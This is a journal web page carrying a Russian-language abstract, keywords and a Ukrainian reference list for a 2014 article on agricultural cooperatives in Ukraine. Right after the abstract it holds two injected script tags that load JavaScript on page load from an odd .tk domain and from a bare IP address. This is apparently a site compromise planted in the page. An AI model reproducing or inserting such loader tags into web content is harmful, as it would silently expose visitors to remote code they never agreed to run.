ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.436:334.73
Економіка агропромислового виробництва

Формирование и развитие кооперативных отношений в аграрной сфере экономики Украины / // Экономика АПК. - 2014. - № 7 - С. 76

В Украине более 4 млн личных крестьянских хозяйств осуществляют хозяйственную деятельность, производя около половины валовой добавленной стоимости сельскохозяйственной отрасли, значительная часть которой приобретает товарную форму. Производственная деятельность требует соответствующих организационных структур для реализации товарной продукции и оказания помощи в материально-техническом обеспечении. Выявлены причины недостаточного развития таких структур (кооперативов) и обоснованы пути для расширения кооперативных отношений. Дана оценка состояния развития сельскохозяйственной кооперации и определены направления эффективной деятельности кооперативов. Табл.: 2. Библиогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: кооперативное движение, сельскохозяйственные обслуживающие кооперативы, формы хозяйствования, социальный капитал, виды кооперативов, программы развития сельскохозяйственной кооперации

Список использованных источников

 1. Зіновчук В.В. Чи підходить Україні європейська модель сільськогосподарської кооперації / В.В. Зіновчук: Кооперативні читання: 2014 рік: матеріали Всеукр. наук.-практ. конф. (м. Житомир, 27–29 березня 2014 р.).– Житомир: Вид-во «Житомирський національний агроекологічний університет», 2014. – С. 9-18.
 2. Грищенко М.П. Сельскохозяйственные обслуживающие кооперативы: становление и развитие (на примере АР Крым) / М.П. Грищенко, Р.Я. Коринец, А.С. Сеитосманов. – Симферополь:Издательский дом «Тезис», 2012. – 128 с.
 3. Малік М.Й. Оцінка перспектив розвитку сільськогосподарських обслуговуючих кооперативів / М.Й. Малік, Р.Я. Корінець // Економіка АПК. – 2012. – № 7. – С. 3-8.
 4. Масін В.М. Проблеми правового забезпечення розвитку сільськогосподарських обслуговуючих кооперативів: дис. ... канд. юрид. наук: 12.00.06/ В.М. Масін. – К., 2008. – 178 с.
 5. Міжнародна благодійна організація «Добробут громад» / [Електронний ресурс]. – Режим доступу: http://www/.heifer.org.ua/.
 6. Про затвердження Державної цільової економічної програми підтримки розвитку сільськогосподарських обслуговуючих кооперативів на період до 2015 р.: Постанова № 557 від 3 червня 2009 р. / Кабінет Міністрів України // Верховна Рада України: офіційний веб-сайт. – [2009]. – Режим доступу: http://www/.portal.rada.gov.ua/.
 7. Про затвердження Порядку використання коштів, передбачених у державному бюджеті для підтримки сільськогосподарських обслуговуючих кооперативів: постанова №272 від 9 березня 2011 р. / Кабінет Міністрів України // Верховна Рада України: офіційний веб-сайт. – [2011]. – Режим доступу: http://www/.portal.rada.gov.ua/.
 8. Про затвердження Примірних правил внутрішньогосподарської діяльності сільськогосподарського обслуговуючого кооперативу: наказ №643 від 30 жовтня 2013 р. / Міністерство аграрної політики та продовольства України: офіційний веб-сайт. – [2013]. – Режим доступу: http://www/.minagro.gov.ua/ministry?nid=10089.
 9. Про затвердження примірних статутів сільськогосподарського обслуговуючого кооперативу: наказ Міністерства аграрної політики України від 26.062003 № 191 // [Електронний ресурс]. – Режим доступу: http://zakon.nau.ua/doc/?uid=1021.303.0.
 10. Про затвердження Примірного договору про надання фінансової підтримки сільськогосподарському обслуговуючому кооперативу: Наказ від 29 вересня 2009 р. № 714 //[Електронний ресурс]. – Режим доступу: http//document.ua/pro-zatverdzhennja-primirnogo-dogovoru-pro-nadannja-finansov-doc4932.html.
 11. Про сільськогосподарську кооперацію: Закон України від 17 липня 1997 р. (у редакції Закону від 20.11.2012 № 5495-VІ) / Верховна Рада України // Відом. Верхов. Ради України (ВВР). – 1997. – № 39. – Ст. 261.
 12. Як створити сільськогосподарський обслуговуючий кооператив // Сприяння розвитку сільськогосподарських організацій в Україні ; за ред. Р. Блока. – К. : TACIS, 2000. – 14 с.
Читать статью: 14_07_76-82.pdf